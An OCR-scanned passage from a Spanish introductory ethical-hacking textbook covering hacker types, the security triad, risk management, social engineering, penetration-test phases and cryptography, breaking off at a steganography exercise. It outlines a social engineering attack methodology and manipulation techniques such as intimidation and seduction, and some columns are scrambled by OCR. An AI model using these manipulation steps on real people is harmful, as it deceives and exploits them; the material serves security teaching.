Ahora, el tema del uso del conocimiento para 
proteger y comprometer informacion ha estado en 
debate desde siempre, tanto que las diferentes 
“filosofías” de uso de los hackers estan clasificados 
con sombreros, que definen el objetivo y tipo de 
acciones que un hacker podria realizar. 


Generalmente hablamos de tres tipos de sombrero: 


Sombrero Blanco: 

Empezaremos hablando del hacker bueno, el que 
debemos aspirar a ser, y el tipo de hacker que 
somos en WhiteSuit Hacking. Este tipo de hacker, 
a pesar de que tiene capacidades destructivas 
como cualquier otro, se dedica a proteger la 
informacion de sus clientes, nunca hace pruebas 
de penetracion ni analisis de vulnerabilidades sin 
autorización y un contrato firmado, también es 
conocido como el hacker ético, ya que nunca 


realiza actividades de hacking que puedan caer 


fuera de la ley o de cierto estándar de ética. 








WHITE 


Sombrero Gris: 

Este tipo de hacker ha sido debatido ampliamente, 
ya que no sigue los estándares de ética ni legales 
que sigue el de sombrero blanco, sin embargo, 
tampoco busca realizar actos delictivos por el 
hecho de causar daños o robar dinero, y, sin 
embargo, algunos de los hackers más hábiles que 
existen, operan bajo este “sombrero”, (incluso este 
libro y certificación está basado en metodologías 
del sombrero gris). 

Estos hackers simplemente atacan por que 
pueden, para probarse a sí mismos, o para mejorar 
la seguridad en general probando que hay una falla 
en esta, han sido tan predominantes últimamente 
que fuera de buscarlos con la fuerza de la ley, 
muchas empresas como Facebook, Google y Uber 
han decidido crear programas de recompensas 
(bug bounty) para motivar a estos hackers a 
continuar con esta actividad, pero reportar sus 
encuentros antes que publicarlos y dañar la imagen 


de la organización. 
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Peres. 


Podemos decir que, estos hackers hackean fuera 
del marco de la ley, pero no para robar o danar la 


seguridad de la informacion de una organizacion. 


Sombrero Negro: 

Este es el tipo de hacker que todos hemos 
escuchado, o hasta tenidos encuentros con alguno, 
es el que sale muy seguido en las peliculas de 
Hollywood, es el cibercriminal. 

Este tipo de hacker es el que tiene una mision 
clara, comprometer la seguridad de la 
información, ¿para qué? Generalmente dinero, a 
veces poder, a veces reputación, piensa en la red 
como una zona de guerra, y estos son los 
terroristas, los guerreros que saquean ciudades, 
sin embargo, no pienses en un cibercriminal como 
cualquier otro criminal, este tipo de hacker no por 
ser un criminal, debes pensar en él como el 
pandillero de la esquina que te asalta con una 
havaja. 

Estos hackers son gente con estudios avanzados, 


muchos con maestrías o incluso doctorados, y 
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millones de dólares en fondeo en investigación 
simplemente para crear nuevas formas de 
comprometer la información de las personas y 
organizaciones, algunos son guerreros, y debes 
pensar en ellos como exmilitares altamente 
capacitados, algunos son creadores de armas, y 
debes pensar en ellos como lo que son, ingenieros 
expertos en su área, y con recursos suficientes 
como para atacar a la mayoría de las 


organizaciones actualmente. 


Esta es la razón por la que existimos nosotros 


como empresa, esta es la razón por la que 
existe este libro, sin conocimientos, estamos 


indefensos ante estos criminales, somos como un 
niño intentando pelear contra un soldado altamente 
capacitado y armado, la única forma de esperar 


defendernos es crecer en conocimientos. 


Seguridad de la información y seguridad 


informática 


No toda la información está en un sistema 


informático, y, sin embargo, no deja de ser 
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informacion, potencialmente sensible, y con 
potencial de ser comprometida. 

Dentro de la seguridad de la información se tiene 
que considerar todas las áreas en las que se pueda 
comprometer algún dato sensible, a mí me gusta 


dividirlas en tres áreas: 


1. Seguridad física: 
Esta área es en la que se puede comprometer la 
seguridad del punto de vista físico, es decir, 
cualquier cosa tangible, como una puerta o ventana 
que permita acceder a un intruso, o un papel en 
donde esté escrito algo confidencial, aunque 
últimamente se le pone cada vez menos atención, 
es muy importante tomarlo en cuenta, ¿porque cuál 
es el punto de tener una computadora con antivirus 
y mitigaciones contra ataques informáticos si un 
ladrón puede simplemente entrar por la ventana y 
robarsela? 
Algunos ejemplos de como mejorar la seguridad de 
esta area son la seguridad perimetral (cercas, 


bardas, puertas) y el diseno de seguridad 
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(transparencia, luz, espacios abiertos), entre otras 
cosas. 

Cabe mencionar que en esta area se considera 
particularmente importante proteger la integridad 
de las personas (asi es, también se considera 
seguridad fisica proteger a las personas contra 


incendios, ataques terroristas, terremotos, etc.). 


2. Seguridad social, o ingenieria social 
Aqui lo importante es proteger la informacion que 
las personas saben, ya que también informacién 
sensible puede ser filtrada por ese medio. Por 
ejemplo, que alguien escuche una conversación 
privada y obtenga información sensible 
simplemente por escuchar y estar cerca, ¿o que tal 
que un directivo sea seducido por una espía 
corporativa para que hable de secretos 
empresariales? Suena fantasioso, pero sucede 


mucho más común de lo que pensarías. 


Este tipo de seguridad usualmente es el área más 


débil de cualquier organización, ya que la gente es 
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fácilmente manipulable. 
Algunas formas de mitigar esto es con buenas 
políticas de seguridad y capacitación al 
personal. 

3. Seguridad lógica 
Aquí finalmente podemos decir que es seguridad 
informática, todo lo anterior era seguridad de la 
información. La seguridad lógica es todo lo que 
está dentro de un sistema, y es de las formas más 
comunes de ataque hoy en día, puede ser un 
ataque a un servidor, una base de datos, 
computadora, o incluso celular. 
Algunas de las formas en las que se puede mitigar 
este tipo de ataques es con soluciones de 


seguridad como firewalls, IDS, IPS y antivirus. 


| 


En si, todas las areas de la seguridad de la 
informacion pueden ser mejoradas por medio de 


una auditoría en seguridad, por eso es por lo que 
son tan importantes. 
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Cualidades de la seguridad de la información 


Ahora que sabes que es un hacker, debes saber, 
de qué formas puede ser comprometida la 
seguridad de la información. 
La seguridad de la información debe tener tres 
características para considerarse segura: 

1. Confidencialidad: 
Confidencialidad significa que solo la persona que 
tiene permiso de ver la información puede poder 
verla. 
Un ejemplo serio que alguien viera tus 


conversaciones de Facebook sin tu permiso. 


2. Integridad 
Integridad de la información significa que la 
información solo debe de ser accedida o cambiada 
por la persona que tenga permiso de ello. 
Por ejemplo, si alguien manda un correo 
electrónico desde tu cuenta porque obtuvo acceso 
no autorizado, compromete la integridad de la 


información. 
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3. Disponibilidad 
Y la última cualidad de la información, es que esta 
debe de ser posible acceder, en el momento que 
se requiere, por quien tiene permiso de accederla. 
Un ejemplo de disponibilidad comprometida es 
cuando una página está caída y los usuarios no 
pueden acceder a esta. 
Siempre que un hacker vaya a atacar o defender a 
un activo, buscará defender o atacar en alguna de 


estas tres áreas. 


La triada de la Seguridad 


Confide ncialidad 


Seguridad 
de la 
Información 


Integridad Disponibilidad 
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Metodología para mejorar la seguridad de la 
información 


Ya que vimos las tres cosas que queremos 
proteger, ahora toca saber cómo defenderlas. Para 
proteger la triada de la seguridad, se debe llevar 
una metodología profesional, la cual, si es llevada 
de forma adecuada, mejorará de forma importante 
la seguridad de cualquier organización, y 
minimizará la posibilidad de un ataque exitoso, y, lo 
más importante, es que mitigara las pérdidas 
económicas si el ataque tiene éxito. 
La metodología consiste en 5 fases esenciales: 

1. Análisis de riesgo 
Esta fase sirve para el diagnóstico, para esto, se 
buscan tres cosas en particular, la primera siendo 
vulnerabilidades, que son errores que permitirían 
realizar actos que puedan comprometer la 
seguridad de la información, un ejemplo de esto 
podría ser que no actualizaste el servidor o 
computadora y por lo tanto no tienes el ultimo 


parche de seguridad y eres vulnerable a algún error 
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en el software que tienes instalado. El segundo 
objetivo que se analiza son las amenazas, esto es 
la circunstancia que permite que se materialice el 
escenario en el que se cause una falla en la 
seguridad de la información, como ejemplo podría 
ser que un competidor esté buscando activamente 
sabotearte, ahí está el actor que busca causar un 
daño a tu infraestructura, es una amenaza, y por 
último; el riesgo, que es la probabilidad que una 
amenaza suceda, dando a lugar a un ataque al 
sistema, por ejemplo, no es lo mismo tener una 
organización en la que tienes vulnerabilidades 
críticas y varias personas que quieren atacarte 
pero ninguna tiene el conocimiento o acceso al 
conocimiento técnico para llevar a cabo el ataque, 
al tener una organización con vulnerabilidades 
difíciles de explotar pero con una amenaza que 
tiene los recursos y los medios para explotar dicha 
vulnerabilidad, y por lo que se tiene que hacer un 
análisis del porcentaje que este escenario se 
convierta en realidad, y cuántas pérdidas podría 


causar si se materializa. 
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2 Definir nivel aceptable de riesgo. 
Ningún nivel de riesgo es aceptable, muchos 
pensaran que sí, pero la realidad es que eso no 
existe, no existe sistema que sea 100% 
impenetrable, solo es una cuestión de cuántos 
recursos, tiempo y motivación tenga el atacante, 
tenemos que definir como consultor, junto al 
cliente, un nivel aceptable de riesgo. 
Este nivel aceptable de riesgo debe de ser un nivel 
en el que si se da la circunstancia, no cause 
pérdidas tan grandes al negocio que se pueda ver 
en problemas. Lo obvio es que lo ideal es que 
nunca se causen pérdidas, pero imaginémonos un 
caso, organización “y” tiene una vulnerabilidad y 
amenaza que, si se materializa, causará una 
pérdida de $100,000, sin embargo, la probabilidad 
de que se materialice es Un 5%, y la contingencia 
para eliminar esa vulnerabilidad le costaría a la 
organización $100,000 pesos, tu, siendo el tomador 
de decisiones, harías este gasto? (asumiendo que 


la pérdida monetaria es lo único importante, en una 
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situación real se toman en cuenta un número de 
otros factores). 

Probablemente no, ya que el riesgo contra el costo 
de mitigación y la potencial pérdida es demasiado, 
pero esos factores ayudarían a definir el nivel 


aceptable de riesgo para cada activo. 


3. Diseñar formas de medición. 

Existen muchas formas en la que la seguridad 
puede ser comprometida, y no todas pueden ser 
medidas de la misma forma, así que se tiene que 
pensar en alguna forma de cómo medir y cuál es el 
nivel de seguridad actual, de forma que se pueda 
saber si se tiene que mejorar, o si se está en un 
nivel aceptable. 
Por ejemplo, fallas en ingeniería social podrían ser 
medibles por porcentaje de empleados que 
cayeron en “x” tipo de ataque, y fallas en un 
servidor podría medirse por número de 


vulnerabilidades encontradas. 
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4. Implementar contramedidas. 


Tomando en cuenta el nivel aceptable de riesgo, se 
deben de implementar contramedidas para llevar el 
nivel de riesgo actual debajo del aceptable. 
Algunas contramedidas podrían ser firewalls, IDS, 


antivirus, capacitación, etc.... 


5. Evaluar constantemente. 


La seguridad debe de ser considerada como la 
medicina para los sistemas, imaginemos que 
tuviste cáncer, pero te lo detectaron y te curaste, 
¿Dejarías de ir al doctor por ello? 

Claro que no, igual es la seguridad de la 
información, debe de realizarse un diagnóstico 
cada cierta cantidad de tiempo de forma que se 
confirme que el nivel de riesgo siempre es el 


adecuado. 
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Retos en la seguridad de la información 


Como probablemente te habrás dado cuenta para 
este punto, incluso con nuestras metodologías y 
técnicas como experto en seguridad, la seguridad 
informática no es perfecta, así como un doctor por 
más bueno que sea es imposible salvar a todos los 


pacientes. 


Aquí te presento uno de los mayores retos a la 
seguridad de la información, otra triada. 

En esta traída en particular, se imagina al activo 
que se busca asegurar en el centro, y en cada 
esquina una de tres cosas, seguridad, que se 
refiere a que tan seguro en las tres áreas es un 
activo, usabilidad, que se refiere a que tan fácil es 
de utilizar y funcionalidad, que se refiere a que tan 
bien hace su función principal, mientras más 
muevas el activo hacia un lado, más se aleja de los 
otros, por lo que como experto en seguridad, 
tenemos que aprender a encontrar un equilibrio 


entre estas tres cosas. 
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Por ejemplo, digamos que queremos poner un 
control de acceso con control biométrico y 
contraseña en una fábrica, esto indudablemente 
mejoraría la seguridad, ya que se controlaría mejor 


quien y como entra la gente, sin embargo, la 


usabilidad empeoraría, ya que si tienes empleados 


que no tienen alta capacidad de retención, tendrás 
que capacitarlos para usar el nuevo control de 
acceso, y la funcionalidad también empeoraría 
contra una puerta normal, ya que por más 
sofisticado que sea el sistema, incrementa el 
tiempo en el que un empleado puede llegar de la 
entrada de la fábrica, a su área de trabajo. 

En muchas ocasiones estos “sacrificios” son 
necesarios, sin embargo, tiene que ser analizados 
cuidadosamente, ya que muchos podrían 
representar inversiones o pérdidas importantes si 


una solución es mal implementada. 
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Funcionalidad 





bd grace! 


Seguridad 


Ingeniería Social 


La ingeniería social es la metodología no-técnica 
de manipular a las personas por medio de sus 
defectos para llegar a un objetivo, usualmente 
malicioso. 

Es típicamente referido como el “eslabón más 
débil” de cualquier organización, y por muy buena 
razón, realmente es complicado llegar a ser un 
gran hacker sin conocer mínimo los fundamentos 


de esta metodología de ataque. 
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A pesar de ser una metodología no-técnica, sigue 
cierta metodología para llegar a un objetivo, y se 
toman en cuenta varias “fallas” típicas que tenemos 
inherentemente los humanos. 
Típicamente se mencionan cuatro principales 
fallas humanas que permiten un ataque de 
ingeniería social: 

1. Todos queremos ayudar. 
Somos un animal social, está en nuestra naturaleza 
querer ayudar y agradar a la gente, y generalmente 
eso es algo bueno, pero un ingeniero social sabrá 
como tomar provecho de esa bondad. 

2. El primer movimiento siempre es de 

confianza 

A pesar de que vivimos en un mundo cada vez más 
peligroso, generalmente hablando, a menos que 
veamos algo que nos haga cambiar de opinión, al 
iniciar una interacción con alguien no asumimos 
que nos quiere hacer un daño, entonces, en el 
“primer movimiento”, usualmente estamos con la 
“guardia baja”, esa guardia baja es un buen 


momento para un ataque. 
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3. No nos gusta decir no 
¿Nunca te ha tocado que te piden algo y tienes que 
decir no, o que no puedes hacer algo? ¿Cómo te 
sentiste? Probablemente sentiste algo de culpa o 
negatividad por un momento, y es normal, todos 
tenemos un impulso instintivo para buscar la 
aprobación de otras personas, pero si ese impulso 
es suficientemente fuerte, puede convertirse en 
una vulnerabilidad. 

4. Atodos nos gusta que nos alaben 
Todos tenemos un ego, una autoimagen de 
nosotros en la que generalmente somos más 
atractivos, inteligentes, fuertes de lo que realmente 
somos, y en muchos de nosotros, si se nos 
alimenta esa parte de nuestra personalidad, 
bajaremos la guardia instantáneamente. 
Piénsalo, en algún momento ¿Alguien te ha dado 
un cumplido y automáticamente lo tratas mejor o le 
ayudas? o ¿viceversa? Sucede todo el tiempo, y es 
una de las herramientas preferidas de los 


ingenieros sociales para llevar a cabo sus ataques. 
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Metodología de un ataque de ingeniería social 


Así como existen metodologías para ataques 
informáticos, para realizar experimentos científicos, 
y para muchas otras cosas, también existe una 
metodología que generalmente se sigue para llevar 
a cabo ataques de ingeniería social. 

La metodología no es muy compleja, sin embargo, 
seguirla definitivamente hará la diferencia entre un 
ataque exitoso y uno que no lo es. 


Esta metodología se conforma de 5 pasos básicos: 


1. Objetivo 
Suena obvio, pero antes de realizar cualquier 
ataque, un atacante debe de definir cuál es su 
objetivo. ¿Quiere obtener información clasificada? 
o ¿un acceso directo”? ¿Qué es lo que puede 
esperar obtener y cómo lo va a utilizar? ¿A quién 
vas a atacar para esto? 
Casos de ataques de ingeniería social han 
fracasado debido a que el atacante no planeó 


adecuadamente su objetivo y alcance esperado. 
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2. Investigación previa 
Después de haber determinado el objetivo sobre 
qué quieres obtener y de quien, toca investigar a la 
persona. 
Muchos no saben lo complejo que es un ataque de 
ingeniería social, para hacer uno, estos ataques 
han sido planeados como cualquier operativo 
militar; donde se tiene que investigar todo de la 
persona: sus gustos, dónde vive, cuánto gana, su 
familia, etc., ya que esto se utilizara en las 
siguientes fases. 

3. Primer movimiento. 
El primer “hola” es muy complejo y simple al mismo 
tiempo; se utiliza la información obtenida de la fase 
anterior para planear muy cuidadosamente cuando, 
como, quien y donde se hará el primer 
acercamiento; si la persona es amante de los 
perros, se le contactará en un parque de perros, es 
financiero, se le hablara de una oportunidad de 
inversión. Cada caso es diferente, pero esta fase 
es la más importante, ya que, si esta fracasa, ya 


sabemos la respuesta. 
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4. “Jugada” 
Aquí es donde se explota ese primer acercamiento, 
algunos ataques de ingeniería social pueden tomar 
meses o hasta años dependiendo del objetivo, en 
este paso se debe de obtener la confianza de la 
víctima de cualquier forma posible, y cuando se 
tenga la suficiente, llegar al objetivo, que puede ser 
desde robar una clave, hasta datos de la topología 
de la red de una organización. 

5. Salida 
Y finalmente, un ingeniero social hábil, después de 
haber realizado el ataque, antes que la víctima se 
percate de la situación, éste se deberá haber 


alejado de esta, sin levantar sospechas. 
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Técnicas de ataques de ingenieria social 


Asi como existen diferentes técnicas para realizar 
ataques informaticos en artes marciales y otras 
actividades, hay diferentes técnicas que se pueden 
utilizar dentro de esta metodologia para llegar a 
una meta. No podria mencionar todas las técnicas 
posibles en unos cuantos parrafos, pero 
mencionaré tres de las técnicas más utilizadas en 


ataques de ingeniería social. 
1. Uso de autoridad/Intimidación 


Las personas tienden a responder bastante rápido 
cuando se trata de una persona con autoridad 
sobre ellas, y precisamente esa es una de las 
formas en las que muchos ataques de ingeniería 
social son llevados a cabo, un ingeniero social 
puede hacerse pasar por el jefe de alguien, ya sea 
por medio de un correo electrónico, llamada, o 


incluso inventar un puesto que la víctima no 
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conozca, si la víctima cae, típicamente le hará caso 


al atacante. 


Es muy común que este ataque se utilice junto con 
intimidación, causando miedo en la víctima de 
forma que se vea presionada en actuar 
inmediatamente en favor al atacante. 


2. Explotación sexual 


suena obvio, y de seguro has sido parte de algún 
ataque de estos o mínimo lo has presenciado, aquí 
se utiliza el coqueteo con una persona para que 
baje la guardia hacia el atacante, de este punto 
solo es cuestión de realizar la jugada bien, es uno 
de los ataques más peligrosos para la mayoría de 
las personas, especialmente los hombres. 

Para que te des una idea, literalmente existen 
“agencias” de supermodelos que su verdadero 
hegocio es seducir empresarios y políticos para 
robar información confidencial y venderla o 


utilizarla. 
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3. Ataque de ego 


El atacante utiliza la vanidad o el ego de la víctima, 
que usualmente en estos casos es alguien 
frustrado con su trabajo o que busca aprobación 
externa, y quiere probar lo inteligente o el nivel de 
conocimiento que tiene, el atacante podría 
pretender ser alguien a quien la víctima quiera 
ayudar, por ejemplo, un policía o algo similar, y 
utilizar esa falla para obtener información 


confidencial. 


Como defender contra ataques de 
ingeniería social 


La única forma de detener un ataque de ingeniería 
social, es detectarlo a tiempo, y aunque hay 
algunas claves típicas que menciona el instituto de 
seguridad computacional (CSI: Computer Security 
Institute) como que el atacante se rehusé a dar 
datos de contacto, presión, intimidación, errores 


pequeños, o solicitar información confidencial, la 
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única forma real de mitigar este tipo de ataque, es 
entrenar a los empleados. 

Lo más efectivo seria entrenar a que los empleados 
piensen como un hacker, que aprendan y se 
familiaricen con ataques de hackers, y cómo 
funcionan y tuvieron éxito, para vencer al 
enemigo, hay que pensar como este. 
Adicionalmente, se pueden crear programas de 
capacitación y concientización. Algunas de las 
formas más efectivas son probarle al empleado que 
es vulnerable, realizando un “ataque” interno o de 
un auditor de la compañía, de forma que el 
empleado se dé cuenta que no está 
adecuadamente preparado, y que al momento en el 
que note algo sospechoso, reportarlo. 

Este trabajo de capacitación es bastante complejo 
y laborioso, ya que es difícil que todo el personal 
de una organización este adecuadamente 
capacitada contra la mayoría de los ataques de 
ingeniería social, pero, cualquier mejora a la 
seguridad pone a la organización un paso más 


lejos de ser atacado por un hacker. 
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Prueba de penetración 


La prueba de penetración es una herramienta en la 
seguridad informática, para identificar los riesgos 
amenazas y vulnerabilidades de una organización 
desde el punto de vista físico, lógico(informático) o 
social, simulando un ataque del hacker. 

Esto permite a la organización saber su nivel de 
seguridad, sus vulnerabilidades, y que tan débiles o 
fuertes están, es el equivalente a un doctor 
haciendo un chequeo médico completo. Esto NO 
ASEGURA al 100% que una organización no podrá 
ser atacada, ya que depende del nivel del hacker 
de sombrero blanco que realizó la prueba de 
penetración y del nivel del hacker de sombrero 
negro que realice el ataque malicioso contra la 


organización. 
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Metodología de la prueba de penetración 


¿Qué separa a un hacker profesional de un 
aficionado? En mi opinión, debes aprender la 
metodología adecuada, ya que no importa que tan 
hábil seas, si no la sigues ya que eventualmente te 
encontrarás con algún problema ya sea técnico, o 
profesional por no haberla seguido. 
Hay diferentes fuentes de donde tomar la 
metodología para una prueba de penetración, sin 
embargo, no tienden a diferir mucho una de otra, 
yo prefiero hablar de la metodología estándar de 
prueba de penetración, ya que habla no solo del 
lado técnico, sino también lo que se debe de hacer 
antes y después de una prueba de penetración. 
Esta metodología consiste en 7 pasos: 

1. Interacciones preliminares 
Antes de realizar cualquier paso de una prueba de 
penetración, aunque sea solo “investigar” o 
“escanear” a tu cliente, se debe realizar un contrato 


con el cliente. 
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Este contrato puede variar dependiendo de las 
necesidades de tu cliente, pero hay algunas cosas 
que generalmente todo contrato pre-prueba de 
penetración debe de tener. 

Primer punto: El alcance, en el que dice que se te 
permite probar y hacer y que no, esto es muy 
importante, ya que de no tomarlo en cuenta te 
puede meter en serios problemas. Por ejemplo, 
estás haciendo un trabajo, y encuentras un servidor 
vulnerable a una negación de servicio (DOS), 
realizas el ataque, y, efectivamente se cae el 
servidor, sin embargo, ese era el servidor de 
producción, y ahora le costaste al cliente una 
buena cantidad de dinero en pérdida de 
información y productividad, que fue la razón para 
la que te contrataron desde el inicio. También aquí 
aplica el rango de IPs que puedes o no puedes 
probar, y si puedes realizar ataques contra la 
seguridad física o social de la organización o no. 
Segundo punto: Medir el tiempo, ya que no puedes 
simplemente cobrar por un trabajo que no sabes 


cuándo lo vas a terminar, además, si se realiza un 
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ataque real de un cibercriminal mientras tu estas 
auditando, es mas probable que se piense que la 
culpa es tuya, las formas en las que te puedes 
proteger, es respetando el alcance y tiempo de 
auditoria. 

Tercer punto: Adicionalmente, se deben firmar 
acuerdos de confidencialidad, tanto para tu 
protección como para la del cliente, definir metas 
en específico, y tácticas aceptables y no 
aceptables de ataque, por ejemplo, el cliente te 
puede solicitar que no ataques a sus empleados en 
lo personal, o no hagas pruebas de estrés que 
puedan tumbar un sistema. 

Hay un número de otras cosas que se deben de 
tomar en cuenta, sin embargo, sugiero leer la 
documentación en la fuente al final de esta sección 
o contactar a un abogado, ya que son temas 
legales y normativos. 


84 











2. Obtención de información / 
Reconocimiento. 


Antes de realizar cualquier ataque, necesitas 


información, esta fase también es llamada 


reconocimiento, y la meta aquí, es obtener 
información que pueda ser relevante para 
encontrar una debilidad por donde atacar, esta 
información puede venir de diversas fuentes, desde 
reconocimiento por medio de OSINT (Open 
Source Network Intelligence), que permite 
obtener información que esté públicamente 
disponible, pero que aun así sea útil, hasta 
escaneos directos a los sistemas para determinar 
sistemas operativos, puertos y servicios. 

Esta fase, entendiblemente, es la más tediosa, sin 
embargo, sin lugar a dudas, es la más importante, 
ya que obtener información útil y relevante es lo 
que determinará el éxito o fracaso de una prueba 
de penetración. 

Cabe mencionar, que, en mi experiencia, aquí 
usualmente se invierte más tiempo que en 


cualquiera de las otras fases. 
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3. Modelado de amenazas 
Aquí como pentester, debes entender las 
amenazas a las que tu cliente se puede enfrentar, 
qué tipos de atacantes los pueden/quieren atacar, 
qué activos son los más valiosos o vulnerables en 
su organización, etc. 
Por ejemplo, en algunas compañías su centro de 
Innovación y desarrollo sería el más importante, en 
el otro, son sus estrategias de marketing, mientras 
que en otro, podrían ser sus secretos industriales, 
sea cual sea el caso, debes modelar las posibles 
amenazas a las que esta organización se enfrenta. 
Una vez hecho el modelado de amenazas, 
identificadas cuáles son los activos que son más 
importantes y menos importantes para la 
organización que te ayudará a planear una prueba 


de penetración más eficiente. 
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4. Análisis de vulnerabilidades 
Aquí combinamos la información obtenida en la 
fase de reconocimiento, y la que obtuviste en el 
modelado de amenazas, para identificar las 
vulnerabilidades, o los puntos débiles de los 
activos de la organización. 
Puedes hacer este análisis de vulnerabilidades en 
base a investigación (por ejemplo en procesos, si 
encuentras que alguna persona tiene alguna 
característica riesgosa para la información de la 
organización), o en base a herramientas como 
Nessus, Acunetix u otras, que te permitirán 
encontrar puntualmente las debilidades de un 
activo, y como atacarlas. 

5. Explotación 
En esta fase, realizamos ataques contra las 
debilidades que encontraste en la fase de análisis 
de vulnerabilidades que te permitan llegar a los 
activos más importante de acuerdo a las fases de 
reconocimiento y de modelado de amenazas, aquí 
la meta es comprometer la información en alguna 


de las tres áreas (confidencialidad, integridad, 


87 








bi ted see atl 











disponibilidad), dependiendo del objetivo. 
Para esto deberás dominar decenas de 
herramientas y técnicas de ataque, desde creación 
de malware hasta explotación de 
vulnerabilidades, de forma que puedas obtener 
acceso a tu objetivo. 

Aunque en esta fase se llega al “momento de la 
verdad”, en cuanto a comprometer o no la 
seguridad, en la mayoría de los casos para este 
punto ya tuvo éxito o fracaso la prueba de 
penetración desde antes de realizar el ataque, 
debido a que un pentester experimentado, desde el 
análisis de vulnerabilidades, ya sabe exactamente 
cómo y dónde atacar para tener éxito. 

6. Post-explotación 

Entrar al sistema no es suficiente, luego de entrar, 
se necesita probar la gravedad del asunto, se 
puede probar robando algún archivo, dejando una 
nota de prueba, o, a veces, utilizando ese sistema 
explotado para explotar a otros sistemas. La 
metodología se llama pivote, y por este medio se 


puede utilizar a un sistema comprometido para 
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atacar a otros sistemas comunicados con el 
primero a través de este. 

7. Reportaje 
Finalmente, el reporte, a los técnicos usualmente 
no nos agrada mucho esta fase, pero este es tu 
entregable, es por lo que se paga una prueba de 
penetración, así que tienes que hacerlo bien. 
Primero, usualmente se separa un reporte en dos, 
el reporte técnico, y el reporte ejecutivo, debido a 
que usualmente no es la misma persona que va a 
corregir los problemas, que la que te va a pagar. 
En el reporte técnico, debes narrar toda tu 
metodología; desde cuál es tu objetivo, hasta cómo 
obtuviste acceso a los sistemas o archivos 
comprometidos, así como documentación de cómo 
funcionan las vulnerabilidades y cómo podrías 
corregirlas con recomendaciones, o un plan de 
acción para corregir estas, este reporte está 
enfocado a la gerencia de Tl, es decir, aquí pones 
todos los reportes de vulnerabilidades, capturas de 
pantalla, y datos técnicos que el cliente pueda 


necesitar para corregir sus fallas. 
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Por otro lado, el reporte ejecutivo, es el que Tipos de prueba de penetración 

presentas a la gerencia general, que usualmente Una organización podría ser atacada desde afuera 
son quienes te contratan, Este reporte no debe o desde dentro de distintos niveles, así que las 
llevar ningún dato técnico, a la gerencia le debes 


reportar por medio de gráficas entendibles y llamamos “cajas”, y existen tres. 
resumen, que contengan el nivel de riesgo tienen, Caja Negra 
para que comprendan el dinero que potencialmente La caja negra es la más complicada de todas, este 
se ahorraron al contratarte para mejorar su 


es el punto de vista de un atacante externo, al 
seguridad de la información. 


pruebas de penetración se clasifican en lo que 
| 
hacer una prueba de penetración de caja negra, el | 

En resumen, a el técnico, le interesa la cliente no te dará ninguna información ni acceso 
metodología técnica que usaste, y al ejecutivo le interno, y atacaras 100% como si fueras alguien 
interesa el dinero que representa tus resultados. externo. 


Este es el tipo de prueba de penetración más difícil, 


tardada, y costosa, que solo pentesters 


c experimentados deberían realizar. | 
e 
y E Caja Gris | 
7 A ja gri ierta i idn y nivel de 
J > La caja gris te da cierta información y 
E, Pa 





acceso, varía, pero generalmente te da algún 





Technical Guidelines acceso de algún nivel de alguien interno a la 


ización, al estar dentro, hace el trabajo más 
Fuente para más detalles de cada paso: ANgarUZación, 
https://pentest-standard.or 
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sencillo, y debes tomar en cuenta un ataque desde 
el punto de vista de un empleado. 

Este es el tipo de caja más común, ya que es el 
punto medio, y es bastante efectivo en mejorar la 
seguridad empresarial de una organización. 

Caja Blanca 

La última categoría es la caja blanca, aquí te dan 
absolutamente toda la información sobre lo que 
vayas a auditar, es particularmente útil, por 
ejemplo, cuando haces pruebas de penetración de 
código o sistemas internos, en los que puedes 
identificar errores más fácilmente si tienes 


conocimiento del funcionamiento de estos. 


WHITE -BOX 


GRAY -BOX 
TESTING TESTING [ESTING 


BLACK -BOX 





LERO KNOWLEDGE SOME KNOWLEDGE FULL KNOWLEDGE 
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Formas de ocultar información 


Criptografía 


Criptografía es la práctica y estudio de las técnicas 
que se utilizan para comunicación segura contra lo 
que llamaremos “adversarios”, tiene más de un 
siglo de ser utilizada para proteger la integridad, 
confidencialidad y disponibilidad de canales de 
comunicación, y el fundamento es bastante 
sencillo, digamos que queremos mandar el texto 
“hola” a alguien más, pero no queremos que nadie 
que intercepte la comunicación pueda leerlo, 
entonces cambiamos cada letra de “hola” por otra 
cosa, digamos, por un número, en el que cada letra 
representa su orden en el abecedario, entonces 
mandamos “816121”, haciendo que los 
“adversarios” que intercepten el mensaje no 
puedan leerlo, y al mandarle la “llave”, o el método 
para desencriptarla el mensaje a la persona que si 


quieres que reciba el mensaje, este si podrá leerlo. 
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Esta es una simplificación de lo que es la 
criptografía moderna, que utiliza llaves públicas, 
privadas, y llaves asimétricas tan complejas que 
son esencialmente imposibles de romper(por 
métodos simples) a “fuerza bruta”, o probando 
todas las combinaciones posibles, como podría ser 
el caso con el ejemplo anterior, así que puedes ver 
la criptografía como si fuera un “candado” 
imposible de romper que guarda algún secreto, sin 
embargo, el “adversario” sabe que hay algo ahí y 


que guarda un secreto dicho cofre con candado. 


Cifrado en archivos 


Hay varias formas en las que se utiliza la encriptación, 
una muy sencilla que seguro has visto implementada, 
es la encriptación en archivos, como los archivos PDF o 
comprimidos que necesitan una contraseña para abrir, 


esto es utilizar encriptación en un archivo. 
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Encriptación punta-punta 


También seguramente has escuchado hablar de la 
encriptación punta a punta, por ejemplo en WhatsApp, 
esto significa que transmitiste una llave y te 
transmitieron una llave a ti con quien te estas 
comunicando, haciendo que el canal de comunicación 
entre dos personas por ejemplo, mensajeando por 
WhatsApp, sea privado, también se utiliza esto cuando 
entras a una página, por ejemplo PayPal, un portal de 
pago, o casi cualquier página moderna que tiene 
encriptación SSL, lo cual tu navegador marca como 
“seguro”, esto significa que la pagina a la que entraste 
está comunicándose de forma segura contigo, y que 
nadie puede interceptar fácilmente lo que transmitas por 
este medio, sin embargo, esto 


@ bitps//whitesuithacking.com 


no significa que la pagina sea 


Connection is secure 


segura, solo significa que la 


Learn more 


comunicacion entre tu y la 


Ss ; <> JavaScript 
pagina es privada. 


[Z Pop-ups and redirects 


fi Certificate (Valid) 


Cookies 


Site settings 
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Esteganografía 


Ahora, esteganografía es la otra forma de ocultar 
Información, sin embargo, esta es diferente que 
criptografía, ya que, en vez de ponerle un candado a la 
información, la ocultas en algo de forma que nadie sepa 
que este allí, si comparamos, podríamos decir que 
criptografía seria como ocultar algo en una caja fuerte a 
la vista, y estenografía seria como un camuflaje eso 


mismo a plena vista, pero que nadie reconozca. 


Por ejemplo, un uso común de esteganografía es 
ocultar archivos tal como archivos de texto, programas, 
u otras cosas, en archivos .MP3, .mp4, o imágenes, de 
forma que solo la persona que sepa que tiene que 
buscar algo ahí, va a encontrar algo, hagamos una 
práctica de una forma sencilla en la que podemos hacer 
esto, 


PRISIGNERO HZ 


a 
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Practica 


Vamos a imaginar que tenemos un documento de texto 
